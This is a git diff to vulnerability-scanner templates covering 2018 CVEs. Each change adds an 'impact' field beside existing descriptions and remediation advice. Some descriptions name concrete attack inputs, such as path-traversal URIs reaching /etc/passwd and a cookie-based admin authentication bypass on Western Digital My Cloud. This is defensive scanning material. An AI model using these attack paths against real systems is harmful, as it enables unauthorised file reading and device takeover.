a/http/cves/2018/CVE-2018-1335.yaml +++ b/http/cves/2018/CVE-2018-1335.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: Apache Tika versions 1.7 to 1.17 allow clients to send carefully crafted headers to tika-server that could be used to inject commands into the command line of the server running tika-server. This vulnerability only affects those running tika-server on a server that is open to untrusted clients. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected server. remediation: Upgrade to Tika 1.18. reference: - https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/ diff --git a/http/cves/2018/CVE-2018-13379.yaml b/http/cves/2018/CVE-2018-13379.yaml index 85a76a35fd..2593e07e50 100644 --- a/http/cves/2018/CVE-2018-13379.yaml +++ b/http/cves/2018/CVE-2018-13379.yaml @@ -5,6 +5,8 @@ info: author: organiccrap severity: critical description: Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP resource requests due to improper limitation of a pathname to a restricted directory (path traversal). + impact: | + An attacker can obtain sensitive information such as usernames and passwords. remediation: | Apply the necessary patches or updates provided by Fortinet to fix the vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-13380.yaml b/http/cves/2018/CVE-2018-13380.yaml index e4cdcbddbb..18b0497d1e 100644 --- a/http/cves/2018/CVE-2018-13380.yaml +++ b/http/cves/2018/CVE-2018-13380.yaml @@ -5,6 +5,8 @@ info: author: shelld3v,AaronChen0 severity: medium description: Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and below versions under SSL VPN web portal are vulnerable to cross-site scripting and allows attacker to execute unauthorized malicious script code via the error or message handling parameters. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or updates provided by Fortinet to fix this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-13980.yaml b/http/cves/2018/CVE-2018-13980.yaml index b6835c8640..9c6e9b8f12 100644 --- a/http/cves/2018/CVE-2018-13980.yaml +++ b/http/cves/2018/CVE-2018-13980.yaml @@ -5,6 +5,8 @@ info: author: wisnupramoedya severity: medium description: Zeta Producer Desktop CMS before 14.2.1 is vulnerable to local file inclusion if the plugin "filebrowser" is installed because of assets/php/filebrowser/filebrowser.main.php?file=../ directory traversal. + impact: | + An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server. remediation: | Upgrade Zeta Producer Desktop CMS to version 14.2.1 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-14013.yaml b/http/cves/2018/CVE-2018-14013.yaml index 210ceed65d..4f99e29ec0 100644 --- a/http/cves/2018/CVE-2018-14013.yaml +++ b/http/cves/2018/CVE-2018-14013.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Synacor Zimbra Collaboration Suite Collaboration before 8.8.11 is vulnerable to cross-site scripting via the AJAX and html web clients. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a version of Synacor Zimbra Collaboration Suite Collaboration that is equal to or greater than 8.8.11 to mitigate the vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-14474.yaml b/http/cves/2018/CVE-2018-14474.yaml index 63e99199dd..7ddc86441c 100644 --- a/http/cves/2018/CVE-2018-14474.yaml +++ b/http/cves/2018/CVE-2018-14474.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Orange Forum 1.4.0 contains an open redirect vulnerability in views/auth.go via the next parameter to /login or /signup. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware. remediation: | Upgrade to a patched version of Orange Forum or apply the necessary security patches to fix the open redirect vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-14574.yaml b/http/cves/2018/CVE-2018-14574.yaml index 704253a006..b0bf5d5b63 100644 --- a/http/cves/2018/CVE-2018-14574.yaml +++ b/http/cves/2018/CVE-2018-14574.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Django 1.11.x before 1.11.15 and 2.0.x before 2.0.8 contains an open redirect vulnerability. If django.middleware.common.CommonMiddleware and APPEND_SLASH settings are selected, and if the project has a URL pattern that accepts any path ending in a slash, an attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can craft a malicious URL that redirects users to a malicious website, leading to potential phishing attacks or the exploitation of other vulnerabilities. remediation: | Upgrade to the latest version of Django or apply the relevant patch provided by the Django project. reference: diff --git a/http/cves/2018/CVE-2018-14728.yaml b/http/cves/2018/CVE-2018-14728.yaml index 18e6612bb3..31ee508544 100644 --- a/http/cves/2018/CVE-2018-14728.yaml +++ b/http/cves/2018/CVE-2018-14728.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: critical description: Responsive filemanager 9.13.1 is susceptible to server-side request forgery in upload.php via the url parameter. + impact: | + An attacker can exploit this vulnerability to bypass security controls, access internal resources, and potentially perform further attacks. remediation: | Upgrade to a patched version of Responsive Filemanager or apply the necessary security patches to mitigate the SSRF vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-14916.yaml b/http/cves/2018/CVE-2018-14916.yaml index e759bdd5eb..3b6dd92827 100644 --- a/http/cves/2018/CVE-2018-14916.yaml +++ b/http/cves/2018/CVE-2018-14916.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: critical description: Loytec LGATE-902 versions prior to 6.4.2 suffers from a local file inclusion vulnerability. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the device. remediation: | Upgrade the Loytec LGATE-902 device to version 6.4.2 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-14918.yaml b/http/cves/2018/CVE-2018-14918.yaml index 9d564a9950..e463f47d21 100644 --- a/http/cves/2018/CVE-2018-14918.yaml +++ b/http/cves/2018/CVE-2018-14918.yaml @@ -6,6 +6,8 @@ info: severity: high description: | LOYTEC LGATE-902 6.3.2 is susceptible to local file inclusion which could allow an attacker to manipulate path references and access files and directories (including critical system files) that are stored outside the root folder of the web application running on the device. This can be used to read and configuration files containing, e.g., usernames and passwords. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the device, potentially leading to unauthorized access or information disclosure. remediation: | Apply the latest firmware update provided by LOYTEC to fix the LFI vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-14931.yaml b/http/cves/2018/CVE-2018-14931.yaml index ef5ed3aff6..d45a487ef2 100644 --- a/http/cves/2018/CVE-2018-14931.yaml +++ b/http/cves/2018/CVE-2018-14931.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Polarisft Intellect Core Banking Software Version 9.7.1 is susceptible to an open redirect issue in the Core and Portal modules via the /IntellectMain.jsp?IntellectSystem= URI. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the theft of sensitive information. remediation: | Apply the latest security patches or updates provided by Polarisft to fix the open redirect vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-15138.yaml b/http/cves/2018/CVE-2018-15138.yaml index cda46e7922..84a7a4274c 100644 --- a/http/cves/2018/CVE-2018-15138.yaml +++ b/http/cves/2018/CVE-2018-15138.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: Ericsson-LG iPECS NMS 30M allows local file inclusion via ipecs-cm/download?filename=../ URIs. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the target system, potentially leading to unauthorized access or information disclosure. remediation: | Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-15517.yaml b/http/cves/2018/CVE-2018-15517.yaml index 6adc88d65d..9d84641817 100644 --- a/http/cves/2018/CVE-2018-15517.yaml +++ b/http/cves/2018/CVE-2018-15517.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: high description: D-Link Central WifiManager is susceptible to server-side request forgery. The MailConnect feature on D-Link Central WiFiManager CWM-100 1.03 r0098 devices is intended to check a connection to an SMTP server but actually allows outbound TCP to any port on any IP address, as demonstrated by an index.php/System/MailConnect/host/127.0.0.1/port/22/secure/ URI. This can undermine accountability of where scan or connections actually came from and or bypass the FW etc. This can be automated via script or using a browser. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to internal resources, data leakage, and potential compromise of the entire network. remediation: | Apply the latest security patches or updates provided by D-Link to fix the SSRF vulnerability in Central WifiManager. reference: diff --git a/http/cves/2018/CVE-2018-15535.yaml b/http/cves/2018/CVE-2018-15535.yaml index 8092a8a652..eff101d0de 100644 --- a/http/cves/2018/CVE-2018-15535.yaml +++ b/http/cves/2018/CVE-2018-15535.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: Responsive FileManager before version 9.13.4 is vulnerable to local file inclusion via filemanager/ajax_calls.php because it uses external input to construct a pathname that should be within a restricted directory, aka local file inclusion. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. remediation: | Upgrade to Responsive FileManager version 9.13.4 or later to fix the vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-15745.yaml b/http/cves/2018/CVE-2018-15745.yaml index b738c9d90d..cbb29057f0 100644 --- a/http/cves/2018/CVE-2018-15745.yaml +++ b/http/cves/2018/CVE-2018-15745.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Argus Surveillance DVR 4.0.0.0 devices allow unauthenticated local file inclusion, leading to file disclosure via a ..%2F in the WEBACCOUNT.CGI RESULTPAGE parameter. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server. remediation: | Upgrade to a patched version of Argus Surveillance DVR. reference: diff --git a/http/cves/2018/CVE-2018-15961.yaml b/http/cves/2018/CVE-2018-15961.yaml index b82515d5bc..c6763c3442 100644 --- a/http/cves/2018/CVE-2018-15961.yaml +++ b/http/cves/2018/CVE-2018-15961.yaml @@ -5,6 +5,8 @@ info: author: SkyLark-Lab,ImNightmaree severity: critical description: Adobe ColdFusion versions July 12 release (2018.0.0.310739), Update 6 and earlier, and Update 14 and earlier have an unrestricted file upload vulnerability. Successful exploitation could lead to arbitrary code execution. + impact: | + Successful exploitation of this vulnerability can result in remote code execution, allowing an attacker to take control of the affected system. remediation: | Apply the necessary security patches or updates provided by Adobe to fix this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-16059.yaml b/http/cves/2018/CVE-2018-16059.yaml index c6f6b581f8..90fcebc46d 100644 --- a/http/cves/2018/CVE-2018-16059.yaml +++ b/http/cves/2018/CVE-2018-16059.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WirelessHART Fieldgate SWG70 3.0 is vulnerable to local file inclusion via the fcgi-bin/wgsetcgi filename parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the system, potentially leading to unauthorized access or information disclosure. remediation: | Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in WirelessHART Fieldgate SWG70 3.0. reference: diff --git a/http/cves/2018/CVE-2018-16133.yaml b/http/cves/2018/CVE-2018-16133.yaml index ed4212df54..71fdaebba3 100644 --- a/http/cves/2018/CVE-2018-16133.yaml +++ b/http/cves/2018/CVE-2018-16133.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Cybrotech CyBroHttpServer 1.0.3 is vulnerable to local file inclusion in the URI. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, remote code execution, and potential compromise of the affected system. remediation: | Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in Cybrotech CyBroHttpServer 1.0.3. reference: diff --git a/http/cves/2018/CVE-2018-16139.yaml b/http/cves/2018/CVE-2018-16139.yaml index 1dafd59203..75ed819aaf 100644 --- a/http/cves/2018/CVE-2018-16139.yaml +++ b/http/cves/2018/CVE-2018-16139.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | BIBLIOsoft BIBLIOpac 2008 contains a cross-site scripting vulnerability via the db or action parameter to bin/wxis.exe/bibliopac/, which allows a remote attacker to inject arbitrary web script or HTML. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest patch or upgrade to a newer version of BIBLIOsoft BIBLIOpac 2008 that addresses the XSS vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-16159.yaml b/http/cves/2018/CVE-2018-16159.yaml index 0d300d243b..ddc562e84e 100644 --- a/http/cves/2018/CVE-2018-16159.yaml +++ b/http/cves/2018/CVE-2018-16159.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Gift Vouchers plugin before 4.1.8 contains a blind SQL injection vulnerability via the template_id parameter in a wp-admin/admin-ajax.php wpgv_doajax_front_template request. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database. remediation: Fixed in version 4.1.8. reference: - https://wpscan.com/vulnerability/9117 diff --git a/http/cves/2018/CVE-2018-16167.yaml b/http/cves/2018/CVE-2018-16167.yaml index ec49c9528f..cb3c7f8a9e 100644 --- a/http/cves/2018/CVE-2018-16167.yaml +++ b/http/cves/2018/CVE-2018-16167.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: LogonTracer 1.2.0 and earlier allows remote attackers to execute arbitrary OS commands via unspecified vectors. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system. remediation: | Upgrade LogonTracer to a version higher than 1.2.0. reference: diff --git a/http/cves/2018/CVE-2018-16288.yaml b/http/cves/2018/CVE-2018-16288.yaml index 536beb3d25..16e7f72d77 100644 --- a/http/cves/2018/CVE-2018-16288.yaml +++ b/http/cves/2018/CVE-2018-16288.yaml @@ -6,6 +6,8 @@ info: severity: high description: | LG SuperSign CMS 2.5 allows reading of arbitrary files via signEzUI/playlist/edit/upload/..%2f URIs - aka local file inclusion. + impact: | + An attacker can exploit this vulnerability to read sensitive files, execute arbitrary code, or launch further attacks. remediation: | Apply the latest security patches or upgrade to a patched version of LG SuperSign EZ CMS. reference: diff --git a/http/cves/2018/CVE-2018-16299.yaml b/http/cves/2018/CVE-2018-16299.yaml index 23ed6e3846..71ebbc9e50 100644 --- a/http/cves/2018/CVE-2018-16299.yaml +++ b/http/cves/2018/CVE-2018-16299.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress Localize My Post 1.0 is susceptible to local file inclusion via the ajax/include.php file parameter. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server. remediation: | Update to the latest version of WordPress Localize My Post plugin. reference: diff --git a/http/cves/2018/CVE-2018-16341.yaml b/http/cves/2018/CVE-2018-16341.yaml index b6b3cbd0b0..3e64a3d867 100644 --- a/http/cves/2018/CVE-2018-16341.yaml +++ b/http/cves/2018/CVE-2018-16341.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Nuxeo prior to version 10.3 is susceptible to an unauthenticated remote code execution vulnerability via server-side template injection. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Upgrade Nuxeo to version 10.3 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-16668.yaml b/http/cves/2018/CVE-2018-16668.yaml index d198453e33..63981f37e1 100644 --- a/http/cves/2018/CVE-2018-16668.yaml +++ b/http/cves/2018/CVE-2018-16668.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: CirCarLife before 4.3 is susceptible to improper authentication. An internal installation path disclosure exists due to the lack of authentication for /html/repository.System. An attacker can obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive data, compromising the confidentiality and integrity of the system. remediation: | Upgrade CirCarLife to version 4.3 or higher to fix the improper authentication issue. reference: diff --git a/http/cves/2018/CVE-2018-16671.yaml b/http/cves/2018/CVE-2018-16671.yaml index 5c9a696164..0bda928788 100644 --- a/http/cves/2018/CVE-2018-16671.yaml +++ b/http/cves/2018/CVE-2018-16671.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: CirCarLife before 4.3 is susceptible to improper authentication. A system software information disclosure exists due to lack of authentication for /html/device-id. An attacker can obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive data, compromising the confidentiality and integrity of the system. remediation: | Upgrade CirCarLife to version 4.3 or higher to fix the improper authentication issue. reference: diff --git a/http/cves/2018/CVE-2018-16716.yaml b/http/cves/2018/CVE-2018-16716.yaml index c8e93a6aa6..0edfb42b3b 100644 --- a/http/cves/2018/CVE-2018-16716.yaml +++ b/http/cves/2018/CVE-2018-16716.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: critical description: NCBI ToolBox 2.0.7 through 2.2.26 legacy versions contain a path traversal vulnerability via viewcgi.cgi which may result in reading of arbitrary files (i.e., significant information disclosure) or file deletion via the nph-viewgif.cgi query string. + impact: | + An attacker can view, modify, or delete sensitive files on the server, potentially leading to unauthorized access, data leakage, or system compromise. remediation: | Apply the latest patch or update from the vendor to fix the directory traversal vulnerability in the NCBI ToolBox. reference: diff --git a/http/cves/2018/CVE-2018-16761.yaml b/http/cves/2018/CVE-2018-16761.yaml index 4cb92526c4..52fe71b95b 100644 --- a/http/cves/2018/CVE-2018-16761.yaml +++ b/http/cves/2018/CVE-2018-16761.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Eventum before 3.4.0 contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the theft of sensitive information. remediation: | Upgrade to Eventum version 3.4.0 or later to fix the open redirect vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-16763.yaml b/http/cves/2018/CVE-2018-16763.yaml index d275a79199..e49cdf06c6 100644 --- a/http/cves/2018/CVE-2018-16763.yaml +++ b/http/cves/2018/CVE-2018-16763.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: FUEL CMS 1.4.1 allows PHP Code Evaluation via the pages/select/ filter parameter or the preview/ data parameter. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the target system, leading to complete compromise of the application and potentially the underlying server. remediation: | Upgrade to FUEL CMS version 1.4.2 or later, which includes a patch for this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-16836.yaml b/http/cves/2018/CVE-2018-16836.yaml index d0c62d77eb..f56dcb1682 100644 --- a/http/cves/2018/CVE-2018-16836.yaml +++ b/http/cves/2018/CVE-2018-16836.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: critical description: Rubedo CMS through 3.4.0 contains a directory traversal vulnerability in the theme component, allowing unauthenticated attackers to read and execute arbitrary files outside of the service root path, as demonstrated by a /theme/default/img/%2e%2e/..//etc/passwd URI. + impact: | + An attacker can exploit this vulnerability to read arbitrary files on the server. remediation: | Upgrade to a patched version of Rubedo CMS (>=3.4.1) or apply the provided security patch. reference: diff --git a/http/cves/2018/CVE-2018-16979.yaml b/http/cves/2018/CVE-2018-16979.yaml index e1101ed28a..a4def259ad 100644 --- a/http/cves/2018/CVE-2018-16979.yaml +++ b/http/cves/2018/CVE-2018-16979.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Monstra CMS 3.0.4 is susceptible to HTTP header injection in the plugins/captcha/crypt/cryptographp.php cfg parameter. An attacker can potentially supply invalid input and cause the server to allow redirects to attacker-controlled domains, perform cache poisoning, and/or allow improper access to virtual hosts not intended for this purpose. This is a related issue to CVE-2012-2943. + impact: | + This vulnerability can lead to various attacks such as session hijacking, cross-site scripting (XSS), and remote code execution (RCE). remediation: | Upgrade Monstra CMS to version 3.0.5 or later to mitigate the HTTP Header Injection vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-17153.yaml b/http/cves/2018/CVE-2018-17153.yaml index 59ca6b8d56..6bb07032bd 100644 --- a/http/cves/2018/CVE-2018-17153.yaml +++ b/http/cves/2018/CVE-2018-17153.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | It was discovered that the Western Digital My Cloud device before 2.30.196 is affected by an authentication bypass vulnerability. An unauthenticated attacker can exploit this vulnerability to authenticate as an admin user without needing to provide a password, thereby gaining full control of the device. (Whenever an admin logs into My Cloud, a server-side session is created that is bound to the user's IP address. After the session is created, it is possible to call authenticated CGI modules by sending the cookie username=admin in the HTTP request. The invoked CGI will check if a valid session is present and bound to the user's IP address.) It was found that it is possible for an unauthenticated attacker to create a valid session without a login. The network_mgr.cgi CGI module contains a command called \"cgi_get_ipv6\" that starts an admin session -- tied to the IP address of the user making the request -- if the additional parameter \"flag\" with the value \"1\" is provided. Subsequent invocation of commands that would normally require admin privileges now succeed if an attacker sets the username=admin cookie. + impact: | + An attacker can bypass authentication and gain unauthorized access to the device, potentially leading to data theft or unauthorized control of the NAS. remediation: | Apply the latest firmware update provided by Western Digital to fix the authentication bypass vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-17246.yaml b/http/cves/2018/CVE-2018-17246.yaml index 31aee92b5e..35a45264a0 100644 --- a/http/cves/2018/CVE-2018-17246.yaml +++ b/http/cves/2018/CVE-2018-17246.yaml @@ -5,6 +5,8 @@ info: author: princechaddha,thelicato severity: critical description: Kibana versions before 6.4.3 and 5.6.13 contain an arbitrary file inclusion flaw in the Console plugin. An attacker with access to the Kibana Console API could send a request that will attempt to execute JavaScript which could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system. + impact: | + Successful exploitation of this vulnerability allows an attacker to read arbitrary files on the server, leading to potential information disclosure and further attacks. remediation: | Apply the latest security patches and updates provided by the vendor to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-17254.yaml b/http/cves/2018/CVE-2018-17254.yaml index c042fc16a0..da3a6765e0 100644 --- a/http/cves/2018/CVE-2018-17254.yaml +++ b/http/cves/2018/CVE-2018-17254.yaml @@ -5,6 +5,8 @@ info: author: Suman_Kar severity: critical description: The JCK Editor component 6.4.4 for Joomla! allows SQL Injection via the jtreelink/dialogs/links.php parent parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage. remediation: Update or remove the affected plugin. reference: - http://packetstormsecurity.com/files/161683/Joomla-JCK-Editor-6.4.4-SQL-Injection.html diff --git a/http/cves/2018/CVE-2018-17422.yaml b/http/cves/2018/CVE-2018-17422.yaml index a8119475c3..168a8a59b3 100644 --- a/http/cves/2018/CVE-2018-17422.yaml +++ b/http/cves/2018/CVE-2018-17422.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | dotCMS before 5.0.2 contains multiple open redirect vulnerabilities via the html/common/forward_js.jsp FORWARD_URL parameter or the html/portlet/ext/common/page_preview_popup.jsp hostname parameter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware. remediation: | Upgrade to a version of DotCMS that is higher than 5.0.2 to mitigate the open redirect vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-17431.yaml b/http/cves/2018/CVE-2018-17431.yaml index fc0f098193..c8587f47bf 100644 --- a/http/cves/2018/CVE-2018-17431.yaml +++ b/http/cves/2018/CVE-2018-17431.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: Comodo Firewall & Central Manager (UTM) All Release before 2.7.0 & 1.5.0 are susceptible to a web shell based remote code execution vulnerability. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system. remediation: | Apply the latest security patches or updates provided by Comodo to fix this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-18069.yaml b/http/cves/2018/CVE-2018-18069.yaml index 170c430715..19fa890a4f 100644 --- a/http/cves/2018/CVE-2018-18069.yaml +++ b/http/cves/2018/CVE-2018-18069.yaml @@ -5,6 +5,8 @@ info: author: nadino severity: medium description: WordPress plugin sitepress-multilingual-cms 3.6.3 is vulnerable to cross-site scripting in process_forms via any locale_file_name_ parameter (such as locale_file_name_en) in an authenticated theme-localization.php request to wp-admin/admin.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions. remediation: | Update WordPress sitepress-multilingual-cms to the latest version to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-18264.yaml b/http/cves/2018/CVE-2018-18264.yaml index 28f69ae336..da2d9609eb 100644 --- a/http/cves/2018/CVE-2018-18264.yaml +++ b/http/cves/2018/CVE-2018-18264.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Kubernetes Dashboard before 1.10.1 allows attackers to bypass authentication and use Dashboard's Service Account for reading secrets within the cluster. + impact: | + An attacker can bypass authentication and gain unauthorized access to the Kubernetes Dashboard, potentially leading to further compromise of the Kubernetes cluster. remediation: | Upgrade to Kubernetes Dashboard version 1.10.1 or later to mitigate the authentication bypass vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-18323.yaml b/http/cves/2018/CVE-2018-18323.yaml index b5765e9727..2a20e5d184 100644 --- a/http/cves/2018/CVE-2018-18323.yaml +++ b/http/cves/2018/CVE-2018-18323.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Centos Web Panel version 0.9.8.480 suffers from local file inclusion vulnerabilities. Other vulnerabilities including cross-site scripting and remote code execution are also known to impact this version. + impact: | + Successful exploitation of this vulnerability allows an attacker to read sensitive files on the server. remediation: | Upgrade to a patched version of Centos Web Panel. reference: diff --git a/http/cves/2018/CVE-2018-18570.yaml b/http/cves/2018/CVE-2018-18570.yaml index 09f8ccea5c..bb9fb45a34 100644 --- a/http/cves/2018/CVE-2018-18570.yaml +++ b/http/cves/2018/CVE-2018-18570.yaml @@ -5,6 +5,8 @@ info: author: emadshanab severity: medium description: Planon before Live Build 41 is vulnerable to cross-site scripting. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest patch or upgrade to a non-vulnerable version of Planon Live Build. reference: diff --git a/http/cves/2018/CVE-2018-18608.yaml b/http/cves/2018/CVE-2018-18608.yaml index cfa7a538cc..6a84821cb5 100644 --- a/http/cves/2018/CVE-2018-18608.yaml +++ b/http/cves/2018/CVE-2018-18608.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | DedeCMS 5.7 SP2 is vulnerable to cross-site scripting via the function named GetPageList defined in the include/datalistcp.class.php file that is used to display the page numbers list at the bottom of some templates, as demonstrated by the PATH_INFO to /member/index.php, /member/pm.php, /member/content_list.php, or /plus/feedback.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version of DedeCMS or apply the official patch provided by the vendor to fix the XSS vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-18775.yaml b/http/cves/2018/CVE-2018-18775.yaml index a142d295d1..703a5a61af 100644 --- a/http/cves/2018/CVE-2018-18775.yaml +++ b/http/cves/2018/CVE-2018-18775.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Microstrategy Web 7 does not sufficiently encode user-controlled inputs, resulting in cross-site scripting via the Login.asp Msg parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or updates provided by Microstrategy to fix the XSS vulnerability in the Web 7 application. reference: diff --git a/http/cves/2018/CVE-2018-18777.yaml b/http/cves/2018/CVE-2018-18777.yaml index 74da5445c3..bbb88b1fc6 100644 --- a/http/cves/2018/CVE-2018-18777.yaml +++ b/http/cves/2018/CVE-2018-18777.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Microstrategy Web 7 is vulnerable to local file inclusion via "/WebMstr7/servlet/mstrWeb" (in the parameter subpage). Remote authenticated users can bypass intended SecurityManager restrictions and list a parent directory via a /.. (slash dot dot) in a pathname used by a web application. NOTE: this is a deprecated product. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server. remediation: | Apply the latest security patches or upgrade to a newer version of Microstrategy Web. reference: diff --git a/http/cves/2018/CVE-2018-18778.yaml b/http/cves/2018/CVE-2018-18778.yaml index 06e4aba825..f6ec3b29d4 100644 --- a/http/cves/2018/CVE-2018-18778.yaml +++ b/http/cves/2018/CVE-2018-18778.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDK severity: medium description: ACME mini_httpd before 1.30 is vulnerable to local file inclusion. + impact: | + Successful exploitation of this vulnerability allows an attacker to read arbitrary files on the server. remediation: | Upgrade ACME mini_httpd to version 1.30 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-18809.yaml b/http/cves/2018/CVE-2018-18809.yaml index 9a51288ed7..f231a43a1b 100644 --- a/http/cves/2018/CVE-2018-18809.yaml +++ b/http/cves/2018/CVE-2018-18809.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The default server implementation of TIBCO Software Inc.'s TIBCO JasperReports Library, TIBCO JasperReports Library Community Edition, TIBCO JasperReports Library for ActiveMatrix BPM, TIBCO JasperReports Server, 